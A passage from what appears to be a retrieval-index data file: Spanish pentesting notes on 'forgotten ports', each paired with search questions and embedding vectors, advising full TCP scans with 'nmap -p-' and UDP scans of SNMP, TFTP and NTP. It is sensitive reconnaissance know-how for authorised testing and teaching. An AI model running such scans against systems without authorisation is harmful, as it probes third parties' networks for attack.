-0.01504, 0.03048, 0.00374, -0.04519, -0.02589, 0.02635, 0.058, -0.02551, 0.01582, 0.03716, -0.00647, -0.00912, -0.01789, 0.0129, -0.02563, -0.03409, 0.01457, -0.06129, -0.01174, 0.02438, 0.00611, 0.03119, 0.04281, -0.04059, -0.01769, -0.03177, 0.04505, -0.03286, -0.03496, -0.08047, -0.0542, 0.0078, 0.0107, 0.01685, -0.08705, -0.02419, 0.01544, 0.01218, 0.02673, 0.08615, -0.02903, -0.03621, 0.08257, 0.0607, -0.00163, 0.01796, -0.07483, 0.1055, -0.0052, -0.03128, 0.00174, -0.06776, 0.02062, -0.03239, -0.02004, 0.02971, 0.02788, 0.0303, 0.004, 0.05265, -0.02586, 0.0129, 0.01964, 0.01506, 0.00169, -0.02121, 0.00671, -0.06444, -0.01226, 0.0449, -0.01859, 0.00362, -0.00434, -0.00401, 0.02641, -0.06846, 0.08474, 0.01221, -0.03856, 0.02735, -0.03823, -0.06385, 0.01038, -0.02877, -0.03065, -0.03948, 0.06237, 0.01913, -0.04388, -0.00222, -0.03683]} -{"tipo": "pregunta", "herramienta": "Puertos olvidados", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Puertos olvidados.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Puertos olvidados\n\n> Donde la gente pierde 4 horas: escanear solo el top-1000 TCP. Parte de Trampas de enumeraciΓ³n.", "indexar": "que programa sirve para hacer un scan profundo de puertos mΓ‘s allΓ‘ del top-1000?", "v": [0.02181, -0.03878, -0.21029, -0.02093, -0.02827, -0.15872, 0.06893, -0.12301, -0.09223, -0.09301, 0.00025, 0.01374, 0.04646, -0.15146, -0.04753, -0.04175, -0.01202, -0.02108, 0.09359, 0.08404, -0.00721, 0.00836, 0.00867, -0.1522, 0.07704, -0.005, -0.06083, -0.01077, -0.1298, 0.03019, 0.02355, 0.08238, 0.03224, -0.07592, 0.02979, -0.12934, 0.04583, 0.04352, 0.03267, 0.12093, 0.01757, 0.05583, -0.02348, -0.0317, 0.08452, -0.0329, 0.03545, 0.05858, 0.09145, -0.01894, -0.09154, -0.06268, -0.00759, 0.02757, -0.05451, -0.06699, -0.08354, -0.00487, -0.0209, -0.0901, 0.01595, -0.00572, 0.00881, -0.0842, 0.00492, -0.06136, -0.00527, 0.04776, -0.039, 0.01005, -0.13197, 0.04511, 0.08322, 0.03559, -0.04425, -0.07925, 0.00906, -0.01397, 0.05209, -0.00891, 0.09279, -0.01119, -0.06679, -0.04849, -0.10734, -0.00938, -0.09398, 0.09505, 0.07688, -0.12222, -0.06049, -0.00385, 0.00656, 0.15498, -0.00736, 0.01965, 0.06445, 0.00184, -0.01974, 0.11245, 0.11928, -0.11378, -0.09762, 0.03269, 0.05895, 0.06016, 0.01384, -0.0548, 0.02801, 0.08637, 0.10382, 0.06452, -0.06401, -0.08061, -0.16637, -0.01698, -0.05738, -0.08907, 0.01413, -0.00409, -0.03554, -0.02435, -0.06944, 0.02434, 0.0296, -0.00493, -0.01586, 0.11164, 0.05737, 0.03844, 0.03062, 0.07405, -0.02531, -0.00709, -0.12231, -0.09893, 0.08038, -0.10144, 0.01247, -0.06525, -0.0584, 0.12317, -0.06562, 0.02977, 0.00945, 0.00739, 0.04149, -0.04809, -0.0804, 0.02368, 0.01685, 0.02901, -0.05689, 0.06087, -0.03782, -0.01273, 0.09821, -0.07607, -0.04971, 0.08326, 0.01815, 0.00718, -0.01124, -0.02238, 0.05469, -0.01963, -0.01943, 0.02266, 0.03065, 0.06949, -0.09128, 0.04525, -0.05519, -0.13361, -0.01407, 0.05423, 0.06497, -0.09485, 0.00453, -0.06399, -0.07379, 0.06449, 0.0674, -0.03353, -0.02669, -0.0805, -0.02803, -0.0492, 0.0104, 0.03852, -0.00779, 0.01085, -0.0755, 0.01092, 0.04071, -0.02195, -0.00939, -0.00052, 0.01509, -0.06327, 0.03243, 0.02081, 0.05453, -0.04192, 0.02446, 0.0661, -0.0507, -0.00245, 0.03715, 0.0935, -0.04841, 0.02067, 0.02714, 0.04575, -0.08191, -0.04268, 0.00477, 0.05418, 0.06763, 0.12681, -0.03327, -0.04211, -0.06232, 0.0611, 0.03733, -0.02707, 0.08035, -0.00581, 0.07496, 0.05946, 0.06168, 0.00127, -0.02874, -0.05654, 0.01635, 0.04546, -0.04004, -0.02825, -0.01605, -0.0932, -0.05861, 0.04449, 0.00761, -0.07479, 0.00211, -0.02783, -0.04001, 0.06325, 0.0428, -0.01961, -0.01564, 0.00996, 0.01422, -0.06496, 0.07645, -0.02398]} -{"tipo": "pregunta", "herramienta": "Puertos olvidados", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Puertos olvidados.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Puertos olvidados\n\n> Donde la gente pierde 4 horas: escanear solo el top-1000 TCP. Parte de Trampas de enumeraciΓ³n.", "indexar": "cual es una alternativa a nmap que permita escanear mΓ‘s puertos sin perder tiempo en los comunes?", "v": [0.11062, -0.03961, -0.07764, 0.03467, -0.07335, -0.00446, 0.09229, -0.15283, -0.29971, -0.03992, -0.09595, 0.04161, 0.09696, 0.01681, -0.04633, -0.01104, 0.00737, 0.02671, 0.19527, 0.1147, -0.092, -0.00323, 0.00122, -0.00724, -0.03977, 0.01844, -0.02153, 0.03353, -0.1549, -0.02433, -0.04173, 0.06691, 0.15995, -0.04361, 0.01562, -0.06267, 0.09733, -0.0331, 0.08874, -0.01431, 0.03756, 0.05384, -0.07416, -0.05996, -0.04663, -0.12198, -0.18931, 0.10735, 0.02559, -0.05789, -0.16988, 0.08694, -0.06809, 0.0371, 0.00429, 0.0093, 0.08631, 0.02866, -0.01874, -0.10554, -0.10165, 0.11406, -0.00489, -0.10953, 0.00403, -0.03941, -0.04007, 0.00658, -0.12649, 0.05748, -0.08417, 0.00571, 0.01687, -0.00279, -0.05888, -0.08645, -0.02656, 0.03759, 0.04498, 0.01593, 0.11538, -0.11884, -0.04825, -0.0318, -0.05932, -0.12026, 0.04753, -0.05113, 0.00444, -0.01824, 0.02864, -0.02863, 0.05516, 0.16439, -0.05006, -0.07123, -0.00145, 0.08783, -0.03185, 0.06665, 0.06433, 0.04553, -0.12161, 0.05008, -0.0325, 0.02288, 0.05214, 0.0153, 0.0115, 0.0637, 0.06176, 0.07412, -0.02858, -0.07617, 0.03646, -0.01346, 0.00573, -0.10695, -0.08748, -0.02729, -0.01123, -0.12276, -0.02303, -0.00725, -0.00567, 0.01468, 0.08655, -0.01489, 0.0404, 0.05646, -0.02381, -0.01073, -0.02778, -0.05163, -0.11034, -0.03593, 0.04363, -0.03792, 0.03963, 0.00862, -0.04744, 0.01785, -0.07624, -0.03702, 0.01026, 0.0158, 0.04348, -0.06737, -0.08761, -0.0921, -0.02978, 0.08306, -0.07253, 0.07489, -0.03217, 0.06519, 0.02578, -0.06851, -0.02746, 0.0853, 0.00273, 0.03133, -0.00078, -0.03352, 0.02766, -0.08199, -0.02727, 0.022, 0.00221, -0.04066, 0.04808, 0.0906, -0.03512, -0.08862, 0.04557, -0.00763, -0.0103, -0.07238, -0.04092, -0.01669, -0.0573, 0.04629, -0.05104, 0.02696, -0.01499, -0.1157, -0.03188, -0.01192, -0.05192, 0.07194, 0.00385, -0.00966, -0.04466, -0.01398, -0.05893, -0.00959, 0.035, -0.06784, -0.01231, -0.01963, -0.03042, -0.00323, 0.03292, -0.00194, 0.0226, 0.02622, -0.06626, 0.05154, 0.01885, 0.04055, 0.00378, 0.01702, 0.03023, -0.02456, -0.01108, 0.01152, 0.03306, 0.00504, -0.03147, 0.02607, -0.00741, 0.03346, 0.02187, 0.00382, -0.04473, -0.00173, 0.05603, 0.1135, 0.00336, 0.02029, 0.0233, -0.0004, -0.04845, 0.01783, 0.04859, 0.04874, 0.01944, -0.03989, 0.02054, -0.02843, 0.07148, 0.02437, 0.00557, 0.02086, -0.00493, -0.03821, -0.06674, 0.01897, 0.01313, -0.03125, 0.0088, 0.0653, 0.00348, -0.01628, 0.08703, -0.03079]} -{"tipo": "pregunta", "herramienta": "Puertos olvidados", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Puertos olvidados.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Puertos olvidados\n\n> Donde la gente pierde 4 horas: escanear solo el top-1000 TCP. Parte de Trampas de enumeraciΓ³n.", "indexar": "con que puedo encontrar puertos ocultos que no aparecen en las listas estΓ‘ndar?", "v": [0.36972, 0.08788, -0.12114, 0.03726, 0.01309, -0.10288, 0.10658, -0.0868, -0.11479, -0.09905, -0.05369, -0.02923, 0.08248, 0.00246, -0.04172, -0.0512, -0.04421, -0.0398, 0.04393, 0.02427, -0.06101, -0.06853, -0.0815, -0.02459, -0.00258, -0.02945, 0.05504, -0.00069, -0.13298, 0.01897, 0.02738, 0.0205, -0.03021, -0.01816, 0.00792, -0.09289, 0.01324, -0.02123, -0.02227, 0.03573, 0.1063, 0.03738, 0.0514, -0.05367, 0.07526, -0.05896, -0.12339, 0.1151, 0.06964, -0.04294, -0.02798, -0.0447, -0.13496, 0.02844, -0.04466, -0.09009, 0.03168, 0.15211, 0.05824, -0.05255, -0.08751, 0.0457, 0.035, -0.04482, -0.04575, 0.01555, -0.02633, 0.13478, -0.05726, -0.04897, -0.04067, 0.0091, 0.0079, -0.00474, 0.06528, 0.005, -0.01388, -0.0625, 0.04453, 0.10877, 0.05177, -0.02621, 0.00327, 0.01022, -0.02604, -0.11622, -0.13936, 0.00979, -0.03877, -0.16262, 0.06008, 0.00289, -0.08329, 0.09044, -0.01503, 0.00214, 0.00416, 0.01321, -0.02209, 0.05373, 0.00462, 0.09107, -0.07244, 0.10316, 0.01924, 0.02799, 0.01837, -0.07246, 0.05452, -0.00392, 0.07181, -0.04737, 0.0238, -0.05701, 0.00706, 0.04355, 0.06199, -0.06037, -0.04819, -0.00067, -0.04465, -0.12191, -0.10158, 0.05353, 0.08071, -0.02252, 0.02793, 0.11944, 0.02142, -0.01062, -0.00285, 0.0626, -0.06533, -0.08304, -0.08786, -0.03638, -0.02304, -0.04213, -0.01298, 0.0249, 0.02786, 0.06029, -0.01658, -0.02431, 0.01641, -0.03068, 0.05702, -0.00848, -0.08516, -0.05406, 0.01191, 0.09356, 0.04223, 0.0626, -0.00352, 0.07136, 0.11551, -0.04163, 0.02669, 0.00504, 0.00588, 0.07513, -0.09764, -0.03069, 0.03356, 0.00565, -0.03423, -0.02872, 0.00992, -0.05916, -0.01387, 0.03876, -0.04427, -0.12321, -0.0294, 0.01657, -0.01675, -0.07049, 0.00601, 0.02147, -0.0662, 0.10868, -0.045, -0.04341, -0.04492, -0.09047, 0.02127, -0.11706, 0.00407, 0.06235, -0.01082, -0.00656, -0.02335, 0.0157, -0.06577, -0.03671, 0.01965, 0.06846, 0.01495, -0.12135, 0.01633, 0.00973, 0.00815, -0.04782, 0.03105, 0.00805, -0.0972, 0.05696, -0.00993, 0.05287, 0.03942, -0.02759, 0.02921, -0.03574, -0.04312, 0.01377, -0.05881, -0.05062, 0.01731, 0.03453, -0.01463, 0.04542, 0.03063, 0.00957, 0.01305, -0.01333, 0.01778, 0.05233, 0.03223, 0.06411, 0.00353, 0.02265, -0.07963, -0.04792, 0.00598, -0.00823, -0.05105, -0.01068, -0.02285, 0.02435, 0.04014, 0.00376, 0.04823, -0.08356, 0.08533, -0.07721, 0.01916, -3e-05, 0.04729, -0.06035, -0.06745, 0.08051, 0.08351, -0.05192, 0.06305, -0.09579]} -{"tipo": "pregunta", "herramienta": "Puertos olvidados", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Puertos olvidados.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## UDP (casi siempre olvidado)\n```bash\nnmap -sU --top-ports 50 -T4 IP\n```\n- **SNMP (161)**, TFTP (69), NTP (123) suelen dar oro β†’ ver SNMP.", "indexar": "que herramienta sirve para escanear puertos UDP", "v": [0.03114, -0.15183, -0.19329, -0.19477, 0.13697, -0.05347, 0.08418, -0.13725, -0.01734, -0.00131, -0.08208, 0.04514, 0.0101, -0.16898, -0.17721, -0.10635, 0.02423, -0.03566, 0.02781, 0.02054, 0.02281, 0.09666, -0.07049, 0.00088, -0.06364, 0.02165, -0.02953, -0.00952, -0.14965, 0.0435, 0.02525, 0.14941, -0.01048, -0.09502, -0.03574, -0.17458, -0.00662, -0.0221, 0.11936, 0.09056, 0.07999, 0.03939, -0.07545, -0.08475, 0.07409, 0.03838, -0.09663, 0.06704, 0.05757, 0.08557, -0.08706, -0.0618, -0.13287, 0.04516, -0.06178, -0.01018, 0.11362, 0.02845, 0.03201, -0.10119, -0.12241, 0.05796, -0.05227, -0.08904, -0.02143, -0.02017, -0.04204, -0.01098, -0.11534, 0.04613, -0.1211, 0.04689, 0.0776, -0.02118, -0.07537, -0.11035, -0.01093, 0.08777, 0.04638, 0.0881, 0.06518, -0.03935, -0.15163, 0.05307, -0.03619, -0.05222, 0.03598, 0.00828, 0.03404, -0.14049, -0.05005, -0.00661, 0.00547, 0.1322, 0.02282, -0.03185, 0.01662, 0.02919, -0.01333, 0.01688, 0.12082, -0.01013, -0.07486, -0.007, -0.00911, 0.03183, 0.02054, -0.06663, 0.00772, 0.04693, 0.08683, 0.06082, 0.00808, -0.0548, -0.01809, 0.0301, -0.03391, -0.09125, -0.01013, -0.04188, 0.0494, -0.06661, -0.08443, -0.05659, 0.00199, 0.01142, 0.01818, 0.0311, 0.04109, -0.00554, 0.0513, -0.06575, -0.13229, 0.02947, -0.0667, -0.08489, 0.02982, -0.14407, -0.00747, -0.01635, -0.06414, 0.1037, -0.0966, -0.07446, 0.00312, 0.03742, 0.02438, -0.02719, 0.00302, -0.05737, 0.06133, -0.04819, -0.07902, -0.0021, -0.05556, 0.00624, 0.02359, 0.00774, -0.12972, 0.05235, -0.04676, -0.06372, 0.0047, 0.00776, 0.03664, -0.08146, 0.00701, 0.06154, 0.0268, -0.00191, 0.03673, 0.08524, 0.03486, -0.06399, 0.00432, -0.02752, -0.04827, -0.01924, -0.02681, -0.02327, -0.05638, 0.03834, -0.02693, -0.05466, 0.01258, -0.0683, 0.02729, -0.10026, 0.01313, 0.04538, -0.02891, 0.0313, 0.01901, -0.07495, -0.013, 0.03337, 0.02001, -0.0334, 0.03744, -0.02468, 0.0147, 0.01003, 0.02755, -0.06842, 0.02935, 0.05592, -0.03341, 0.02032, 0.00894, 0.04334, -0.00182, -0.00256, 0.01574, -0.01399, 0.03231, -0.02443, -0.04381, 0.06593, 0.02861, 0.04263, -0.04744, 0.00348, -0.01722, 0.00909, -0.05087, 0.02417, 0.01769, 0.00679, 0.03519, -0.00348, 0.07208, -0.02199, -0.04956, -0.04325, 0.00248, -0.05076, -0.00904, 0.02253, -0.03461, -0.00725, 0.00489, -0.03133, 0.03361, -0.00792, 0.02865, -0.05862, 0.0117, -0.00717, 0.0305, 0.00371, 0.00093, 0.03739, 0.01329, -0.01678, 0.00788, -0.02534]} -{"tipo": "pregunta", "herramienta": "Puertos olvidados", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Puertos olvidados.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## UDP (casi siempre olvidado)\n```bash\nnmap -sU --top-ports 50 -T4 IP\n```\n- **SNMP (161)**, TFTP (69), NTP (123) suelen dar oro β†’ ver SNMP.", "indexar": "con que puedo probar el puerto 161 o 123", "v": [-0.03694, -0.00653, -0.2319, -0.06359, -0.11341, -0.03468, 0.19152, -0.06374, -0.11123, -0.14213, -0.00961, 0.10912, 0.134, -0.04245, -0.17404, -0.08341, -0.01331, 0.04198, 0.01306, 0.06675, 0.01623, -0.06916, -0.11091, -0.10397, 0.21086, 0.03242, -0.04556, 0.05402, 0.02747, -0.03119, -0.04695, 0.02578, 0.05781, -0.00893, -0.02053, -0.03114, 0.0494, 0.02017, 0.04838, 0.15555, 0.07115, -0.03679, 0.00379, 0.02981, 0.10061, 0.01407, -0.04466, -0.02348, -0.09761, -0.03368, -0.01362, -0.0406, 0.00855, 0.02457, -0.04485, -0.03447, 0.00265, 0.04379, -0.03643, -0.06114, 0.06744, -0.05321, 0.03185, -0.04621, -0.06309, -0.08041, 0.04203, 0.10831, -0.12636, -0.00657, -0.03589, 0.02736, -0.00643, 0.04069, -0.00105, -0.07318, 0.0304, 0.06951, -0.00589, -0.00924, -0.14254, 0.00194, 0.01428, -0.07917, -0.00131, -0.03251, -0.08028, -0.04686, 0.11189, -0.09303, 0.10457, -0.03347, 0.04715, 0.16016, -0.07935, -0.0048, 0.01344, 0.06759, 0.01027, -0.04006, 0.02148, 0.00398, -0.09165, 0.07867, -0.03048, 0.03856, -0.05023, -0.06525, 0.04609, 0.02857, -0.01534, 0.01471, -0.01329, -0.04071, -0.03526, -0.04638, -0.15778, -0.04305, 0.00695, 0.03212, 0.02323, -0.0423, -0.05411, -0.00682, 0.05023, 0.00995, 0.06494, 0.09107, 0.02644, -0.04763, 0.07004, 0.04833, 0.03029, -0.02089, -0.04645, -0.00882, 0.03789, -0.08864, -0.01482, 0.05333, -0.01962, 0.0727, -0.01885, -0.02912, 0.02714, 0.08133, -0.08927, 0.00157, -0.01869, 0.01643, 0.0168, 0.08395, -0.00184, 0.06114, -0.0701, 0.02688, 0.16635, -0.09548, -0.00385, 0.00946, -0.0153, 0.08217, -0.01148, 0.04636, 0.01263, -0.05303, -0.0244, -0.03963, 0.05526, -0.05911, -0.00059, 0.07974, -0.08791, -0.0146, 0.00359, 0.09627, -0.07162, -0.01672, -0.03088, -0.02571, -0.04024, 0.05636, -0.04182, -0.04221, -0.06613, -0.04159, -0.02386, -0.02614, 0.05179, 0.0725, 0.01786, 0.02378, -0.07644, -0.02204, -0.0187, -0.00672, -0.01516, -0.04588, 0.00044, -0.1021, 0.01624, -0.05888, -0.02177, -0.0513, -0.01085, 0.06229, -0.08052, 0.06328, 0.01759, -0.03423, 0.01029, -0.09439, 0.12169, -0.03709, -0.08824, 0.01892, -0.00076, -0.04971, 0.0167, 0.05425, 0.02434, 0.02882, 0.03007, 0.04766, 0.03893, 0.03089, 0.0422, 0.01723, -0.06379, 0.07546, 0.0238, 0.08718, -0.00589, -0.0451, 0.00636, 0.00609, -0.00808, 0.05723, -0.0763, -0.07669, 0.02212, 0.10543, -0.03251, -0.03336, 0.06756, -0.09011, -0.05997, 0.01528, -0.08637, -0.06016, -0.07767, 0.04313, 0.05259, -0.04765, 0.01813, -0.0316]} -{"tipo": "pregunta", "herramienta": "Puertos olvidados", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Puertos olvidados.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## UDP (casi siempre olvidado)\n```bash\nnmap -sU --top-ports 50 -T4 IP\n```\n- **SNMP (161)**, TFTP (69), NTP (123) suelen dar oro β†’ ver SNMP.", "indexar": "cual es una alternativa a nmap para hacer un scan de puertos UDP", "v": [0.04258, -0.08733, -0.09392, -0.09806, -0.00392, 0.05032, 0.04988, -0.07963, -0.19794, 0.01455, -0.03059, -0.07694, 0.02376, -0.12099, -0.27211, -0.10352, -0.05971, 0.02059, 0.11237, 0.04518, -0.05492, 0.04742, -0.07009, 0.00467, 0.01522, 0.01366, -0.10607, 0.06201, -0.08511, -0.00651, 0.03226, 0.06888, -0.01714, -0.06541, -0.04376, -0.0681, 0.16183, 0.00159, 0.21071, 0.11838, -0.03533, 0.03016, -0.08773, -0.04606, 0.06633, 0.00157, -0.12054, 0.04861, 0.01878, -0.00729, -0.12871, 0.05578, -0.12369, 0.01581, -0.06353, 0.03035, 0.0389, 0.0005, 0.02458, -0.04445, -0.0548, 0.09835, -0.07647, -0.06993, 0.00486, -0.01482, -0.1169, -0.01446, -0.175, -0.00521, -0.05504, -0.00646, 0.03996, -0.03976, -0.11274, -0.07273, -0.06197, -0.03541, 0.08257, 0.07009, 0.07842, -0.07769, -0.09522, 0.03704, -0.09741, -0.10162, -0.06531, 0.07508, -0.01152, -0.04592, -0.02329, -0.08241, 0.01711, 0.17089, 0.01706, -0.04931, -0.02604, 0.04556, -0.07253, 0.11491, 0.05064, 0.04839, -0.12918, 0.02471, 0.00865, -0.0168, -0.01431, 0.04534, -0.00146, 0.04679, 0.08869, 0.10857, -0.10238, -0.08313, 0.00212, -0.07881, -0.05546, -0.05643, -0.04672, -0.05606, -0.02762, -0.07792, -0.03718, -0.05182, 0.02443, 0.05738, 0.0826, 0.02565, 0.01334, 0.09126, 0.0731, -0.02763, -0.11725, -0.05103, -0.10836, -0.05919, 0.01303, -0.10348, 0.02389, 0.05927, -0.08871, 0.06564, -0.02627, -0.01051, 0.04238, -0.02226, -0.01624, -0.02849, -0.02932, -0.01762, 0.00516, 0.0282, -0.07308, 0.05344, -0.01126, -0.00468, -0.00307, -0.04909, -0.0474, 0.10906, 0.02842, -0.0473, -0.00864, 0.01715, 0.0209, -0.01726, -0.0312, 0.03214, -0.0475, -0.10036, -0.02901, 0.09871, -0.03142, -0.07262, 0.05036, -0.01586, 0.0059, -0.04233, 0.01372, -0.0244, -0.04205, 0.05487, -0.00744, -0.01439, 0.01128, -0.0799, 0.04683, -0.04004, 0.00262, 0.03834, 0.00597, 0.03857, -0.05466, -0.00662, -0.01874, 0.01249, 0.04934, -0.04836, 0.00576, -0.03446, 0.00097, -0.00333, 0.0494, -0.06593, -0.02778, 0.00708, -0.07171, 0.08082, -0.02858, 0.03577, 0.03243, 0.01098, 0.06996, 0.00272, -0.0573, 0.0049, -0.06855, 0.02102, 0.04184, 0.00815, -0.02714, 0.02382, -0.04011, 0.04851, -0.0471, 0.01413, 0.03303, 0.0425, 0.0367, 0.00417, 0.05701, 0.04495, -0.01483, -0.00222, 0.0347, 0.03571, -0.0308, 0.0363, -0.00209, -0.03979, 0.06561, -0.02783, 0.03911, 0.00927, 0.03873, 0.00513, -0.05843, 0.0596, 0.01545, 0.00353, 0.01916, 0.03191, 0.01574, 0.02809, 0.04434, -0.01775]} -{"tipo": "pregunta", "herramienta": "Puertos olvidados", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Puertos olvidados.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Puertos altos TCP\n```bash\nnmap -p- --min-rate=5000 IP # los 65535, no solo top-1000\n```\n- Servicios escondidos en puertos raros (8080, 50000+...).", "indexar": "quΓ© herramienta puedo usar para escanear todos los puertos TCP de alta y baja nΓΊmero", "v": [-0.04572, -0.06311, -0.23469, -0.03994, 2e-05, -0.13287, 0.10523, -0.09281, -0.11848, 0.00561, -0.19255, 0.04214, 0.04604, 0.0233, -0.02484, -0.00288, -0.02565, -0.07271, 0.11118, 0.01619, 0.0505, -0.06276, -0.07214, -0.0162, -0.00059, 0.08155, 0.00658, -0.03388, -0.21034, 0.0281, -0.04893, 0.04535, 0.08449, -0.00588, -0.00422, -0.05491, 0.02479, -0.02872, 0.05255, 0.06435, 0.0089, 0.06092, -0.07584, -0.08445, 0.09682, 0.02224, -0.0633, 0.07482, 0.00369, 0.04826, -0.14226, -0.14249, -0.11019, -0.02803, -0.10494, -0.08584, 0.12989, 0.04856, 0.01978, -0.17919, -0.0645, 0.05992, -0.11255, -0.10388, -0.08974, -0.09765, 0.00506, -0.0455, -0.08167, 0.05743, -0.09052, 0.01785, -0.01162, 0.00269, 0.06581, -0.07625, -0.07366, 0.01315, 0.03977, 0.03151, 0.04718, -0.06933, -0.08139, -0.05603, -0.09836, -0.04694, 0.03507, -0.06381, 0.04043, -0.12457, 0.0146, 0.00021, 0.01526, 0.05285, 0.02141, -0.01761, -0.0155, 0.00811, -0.02085, 0.02711, 0.16986, 0.00313, -0.04544, 0.05537, 0.02653, -0.01906, 0.03643, -0.09842, 0.00484, 0.04, 0.04827, 0.08172, -0.06659, -0.03667, -0.0895, -0.0091, -0.0584, -0.08943, 0.00691, -0.08338, 0.04589, 0.00488, -0.00581, -0.0408, 0.075, -0.01381, 0.00902, 0.10993, 0.01696, -0.02716, -0.02182, -0.02757, -0.10847, -0.03848, -0.0671, -0.06661, 0.01487, -0.13501, 0.01864, -0.02026, -0.0033, 0.03026, -0.11056, -0.07906, 0.04001, -0.00295, 0.04497, -0.0258, -0.0326, -0.0052, 0.10621, -0.02235, -0.06119, 0.02078, -0.03855, 0.04909, 0.07973, -0.05941, -0.07439, 0.06016, -0.11679, -0.04365, -0.0199, -0.00361, 0.03639, -0.09262, 0.02941, 0.02057, 0.02714, 0.02049, 0.05319, 0.09573, 0.01249, -0.08425, 0.04854, -0.08722, -0.05853, -0.04778, -0.11239, -0.07566, -0.06612, 0.02044, -0.02611, -0.06083, 0.03347, -0.068, 0.02237, -0.07759, 0.02933, 0.09338, -0.01608, 0.07254, -0.01016, -0.04924, -0.02509, 0.00876, 0.05208, -0.05022, 0.07487, -0.05814, 0.00481, -0.00933, 0.02874, -0.08308, 0.08589, 0.02532, -0.05434, -0.00118, 0.03457, 0.06715, 0.02732, -0.03798, 0.03354, -0.02139, -0.033, 0.02814, -0.0377, 0.09424, -0.00129, 0.02364, -0.03166, -0.00554, 0.0366, 0.04353, -0.04642, 0.0134, 0.0004, 0.01918, -0.00276, 0.05572, 0.03732, -0.00381, 0.0075, -0.06567, -0.00679, 0.0005, 0.01856, 0.01296, -0.05967, -0.01184, -0.0038, 0.05057, -0.00038, 0.02447, 0.00302, -0.05025, -0.02231, 0.01483, -0.00171, -0.0637, -0.02348, 0.02329, 0.03467, -0.05106, 0.01968, 0.01327]} -{"tipo": "pregunta", "herramienta": "Puertos olvidados", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Puertos olvidados.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Puertos altos TCP\n```bash\nnmap -p- --min-rate=5000 IP # los 65535, no solo top-1000\n```\n- Servicios escondidos en puertos raros (8080, 50000+...).", "indexar": "con quΓ© programa detecto servicios que se esconden en puertos raros o no convencionales", "v": [0.18421, -0.00052, -0.11381, -0.11779, 0.06612, -0.08425, 0.14707, -0.03488, -0.08603, -0.12686, -0.06971, 0.09751, -0.04697, -0.10497, 0.03198, -0.01844, 0.04643, 0.05537, 0.11571, 0.0903, -0.11367, -0.13934, 0.00501, -0.04096, 0.03934, -0.01911, 0.05328, -0.03493, -0.00422, 0.07859, -0.0524, 0.00704, 0.10672, 0.01388, -0.07221, -0.09795, 0.05291, -0.00111, 0.00207, 0.07084, 0.14304, -0.05366, -0.03779, 0.00904, 0.07717, -0.06401, -0.11657, 0.00014, 0.04027, -0.0332, -0.02113, -0.01593, -0.13802, 0.0041, 0.00284, -0.05433, -0.05519, 0.0741, 0.01873, -0.09129, 0.00179, 0.08698, 0.02356, -0.04999, 0.0516, -0.07212, 0.02103, 0.10169, -0.04547, -0.05107, -0.05116, -0.05767, 0.06338, 0.09523, 0.02213, -0.03476, -0.03566, -0.01414, 0.10066, -0.02992, -0.01925, 0.02513, -0.00703, 0.09094, -0.10904, -0.05043, -0.07742, -0.00258, -0.00873, -0.15499, 0.08979, 0.05913, -0.05232, 0.09763, 0.02772, 0.03281, 0.14323, 0.02118, -0.04347, 0.10901, 0.12404, 0.04545, -0.1238, 0.1253, -0.00502, 0.07423, 0.01564, -0.01691, 0.00375, 0.05725, 0.08834, 0.00227, -0.01902, -0.08037, -0.02811, 0.10378, 0.03115, -0.0996, 0.00089, -0.03879, -0.13463, 0.03087, -0.00493, 0.01826, 0.03718, -0.07488, -0.05359, 0.11785, 0.02327, 0.08929, 0.03892, -0.05769, -0.05202, -0.01319, -0.10184, -0.01732, 0.0353, -0.04613, -0.031, 0.02337, 0.00674, 0.03545, -0.02002, 0.03266, 0.0331, -0.02969, 0.07918, 0.03383, -0.0528, -0.00907, -0.03915, 0.03822, -0.03489, 0.03731, -0.1, 0.01521, 0.09772, -0.05594, -0.06328, 0.05784, 0.0163, 0.02358, -0.0157, -0.03027, 0.06268, 0.00352, 0.00178, -0.04235, 0.05864, -0.00913, -0.07255, 0.06142, -0.04749, -0.10692, -0.05143, 0.05996, -0.04287, -0.10713, 0.06464, -0.03818, -0.10615, 0.07964, 0.03131, -0.03876, -0.0121, -0.05398, -0.05663, -0.0645, -0.00664, 0.03157, -0.02227, -0.03893, -0.05833, 0.05723, -0.08508, -0.01962, -0.01566, 0.02215, 0.01469, -0.01943, -0.03725, 0.0275, 0.00292, -0.00926, -0.04477, 0.05908, -0.08327, 0.04318, 0.03674, 0.11197, -0.0149, -0.0216, 0.0156, -0.03229, -0.00867, 0.01535, -0.01888, 0.04738, 0.05818, 0.12719, -0.04439, -0.02107, 0.00632, 0.03272, -0.00881, -0.04585, 0.06877, 0.07123, 0.04575, 0.04625, 0.05248, -0.05989, -0.0675, -0.01966, -0.01229, -0.01806, -0.03289, -0.01404, -0.00017, -0.07828, 0.03842, 0.0221, 0.03016, -0.0802, 0.04853, 0.00807, -0.05834, 0.01412, 0.04583, 0.02059, -0.04518, 0.08285, 0.05661, -0.09813, 0.06011, -0.04768]} -{"tipo": "pregunta", "herramienta": "Puertos olvidados", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Puertos olvidados.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Por quΓ© importa\n- Nmap por defecto escanea **solo top-1000 TCP**. Un servicio vulnerable en el 54321 es invisible si no haces `-p-`.\n- Regla: **siempre** un `-p-` completo ademΓ‘s del rΓ‘pido.\n\nRelacionado: Nmap Β· EnumeraciΓ³n Β· OSCP MOC", "indexar": "con que puedo escanear todos los puertos de un servidor?", "v": [0.0982, -0.08184, -0.17307, -0.04645, -0.04126, -0.10612, 0.19208, -0.19844, 0.01083, -0.02891, -0.12633, 0.12239, 0.10858, -0.06871, -0.01266, 